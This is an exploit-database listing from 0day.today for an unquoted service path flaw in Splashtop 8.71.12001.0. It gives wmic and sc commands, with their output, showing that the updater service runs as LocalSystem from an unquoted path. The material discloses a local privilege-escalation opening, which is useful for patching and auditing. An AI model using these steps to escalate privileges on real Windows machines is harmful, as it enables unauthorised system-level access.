[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Splashtop 8.71.12001.0 - Unquoted Service Path Vulnerability

Author
hernandez
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-38435
Category
local exploits
Date add
02-04-2023
Platform
windows
# Exploit Title: Splashtop 8.71.12001.0 - Unquoted Service Path
# Exploit Author: A.I. hernandez
# Version: 8.71.12001.0
# Vendor Homepage: https://www.splashtop.com
# Version: current version
# Tested on: Windows 10 21H2
# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Splashtop Software Updater Service       SSUService    C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe

                                      Auto

C:\>sc qc SSUService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SSUService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 0   IGNORE
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Splashtop Software Updater Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

#  0day.today [2024-11-15]  #